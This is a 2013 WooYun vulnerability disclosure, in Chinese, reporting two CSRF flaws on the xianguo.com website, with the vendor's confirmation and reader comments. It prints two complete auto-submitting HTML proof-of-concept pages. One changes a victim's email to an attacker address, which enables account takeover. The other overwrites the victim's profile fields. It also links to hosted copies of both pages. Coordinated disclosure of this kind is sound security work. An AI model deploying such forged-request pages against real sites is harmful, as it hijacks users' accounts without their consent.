当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019794

漏洞标题:鲜果网csrf两枚可劫持用户账号

相关厂商:鲜果网

漏洞作者: VIP

提交时间:2013-03-09 11:35

修复时间:2013-04-23 11:36

公开时间:2013-04-23 11:36

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-09: 细节已通知厂商并且等待厂商处理中
2013-03-11: 厂商已经确认,细节仅向厂商公开
2013-03-21: 细节向核心白帽子及相关领域专家公开
2013-03-31: 细节向普通白帽子公开
2013-04-10: 细节向实习白帽子公开
2013-04-23: 细节向公众公开

简要描述:

补不完的csrf

详细说明:

1.劫持账号
修改邮箱处存在csrf,可修改邮箱,进而劫持账户。因为一个邮箱只能绑定一个账号,所以可以使用数组随机抽取邮箱。
POC:

<html>
<body>
<form name="csrf" action="http://xianguo.com/setting/change-email" method="POST">
<script>
var email =['root1@wooyun.org','root2@wooyun.org','root3@wooyun.org','root4@wooyun.org','root5@wooyun.org','root6@wooyun.org','root7@wooyun.org','root8@wooyun.org','root9@wooyun.org','root10@wooyun.org'];
function Rand(arr, len) {
arr.sort(function () {
return Math.random()-0.5;
});
return arr.slice(0, len);
}
//alert(Rand(email,1));
document.write("<input type=text name=email_ChgOld value="+Rand(email,1)+"></input>");
</script>
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>


2.修改用户信息
修改个人信息处存在csrf,个人信息任意改。由于昵称需要唯一性,所以此处昵称将会被修改为wooyun+5个随机字母。

<html>
<body>
<form name="csrf" action="http://xianguo.com/setting/profile" method="POST">
<script>
function rand(len)
{
var tmp = "";
for(var i = 0; i < len; i++)
{
tmp += String.fromCharCode(Math.floor(Math.random() * 26) + "a".charCodeAt(0));
}
return tmp;
}
document.write("<input type=text name=mark value=wooyun"+rand(5)+"></input>");</script>
<input type="text" name="province" value="-1" />
<input type="text" name="city" value="-1" />
<input type="text" name="nickname" value="乌云" />
<input type="text" name="url" value="http://wooyun.org" />
<input type="text" name="description" value="我中招了" />
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>

漏洞证明:

1.劫持账号

csrf01.jpg


csrf02.jpg


http://email.smtp.yupage.com/xianguo2.htm


2.修改信息

csrf03.jpg


http://email.smtp.yupage.com/xianguo.htm

修复方案:

随机token
求20rank
求礼物

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-03-11 10:38

厂商回复:

感谢@VIP,我们尽快修复~ 静候佳音~

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-11 11:04 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    痛并关注着……

  2. 2013-03-11 12:16 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    @zzR 为啥啊